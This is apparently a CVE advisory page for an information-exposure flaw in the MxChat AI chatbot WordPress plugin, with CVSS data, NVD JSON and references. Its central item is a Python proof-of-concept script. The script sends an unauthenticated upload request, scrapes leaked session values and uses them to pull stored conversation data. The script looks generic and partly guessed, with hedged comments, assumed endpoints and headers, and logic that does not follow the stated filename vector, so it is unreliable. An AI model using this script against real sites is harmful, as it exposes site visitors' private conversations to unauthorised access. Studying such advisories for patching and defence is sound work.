Security Vulnerability Report
CVE-2025-12585 CVSS 5.3 MEDIUM

Published: 2025-12-03 04:16:00
Last Modified: 2026-04-22 20:16:31

Description

The MxChat – AI Chatbot for WordPress plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.5.5 via upload filenames. This makes it possible for unauthenticated attackers to extract session values that can subsequently be used to access conversation data.

CVSS Details

CVSS Score: 5.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

MxChat – AI Chatbot for WordPress <= 2.5.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import re

# CVE-2025-12585 PoC - MxChat Sensitive Information Exposure
# Target: WordPress site with MxChat plugin <= 2.5.5
target = "http://target-wordpress-site.com"

# Step 1: Identify the vulnerable endpoint
upload_url = f"{target}/wp-admin/admin-ajax.php"

# Step 2: Extract session values from upload response
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
    "Content-Type": "multipart/form-data"
}

# Step 3: Send crafted upload request to leak session values
files = {
    "file": ("session_test.txt", b"test", "text/plain")
}
data = {
    "action": "mxchat_upload_file",
    "nonce": ""  # Nonce may not be required for unauthenticated access
}

try:
    response = requests.post(upload_url, headers=headers, files=files, data=data, timeout=10)

    # Extract session values from response
    session_pattern = r'session[_"]*:?\s*["]?([a-zA-Z0-9_-]+)'
    matches = re.findall(session_pattern, response.text)

    if matches:
        print(f"[+] Leaked session values: {matches}")

        # Step 4: Use leaked session to access conversation data
        session_value = matches[0]
        conversation_url = f"{target}/wp-json/mxchat/v1/conversations"
        headers["X-Session-Token"] = session_value
        conv_response = requests.get(conversation_url, headers=headers)
        print(f"[+] Conversation data: {conv_response.text}")
    else:
        print("[-] No session values leaked")
except Exception as e:
    print(f"[-] Error: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12585", "sourceIdentifier": "[email protected]", "published": "2025-12-03T04:15:59.650", "lastModified": "2026-04-22T20:16:31.220", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The MxChat – AI Chatbot for WordPress plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.5.5 via upload filenames. This makes it possible for unauthenticated attackers to extract session values that can subsequently be used to access conversation data."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "references": [{"url": "https://github.com/d0n601/CVE-2025-12585", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/mxchat-basic/trunk/includes/class-mxchat-integrator.php#L107", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3406402%40mxchat-basic&new=3406402%40mxchat-basic&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://ryankozak.com/posts/cve-2025-12585", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/7cf1a90d-6157-40e7-aed8-4d18bc22432d?source=cve", "source": "[email protected]"}, {"url": "https://ryankozak.com/posts/cve-2025-12585/", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}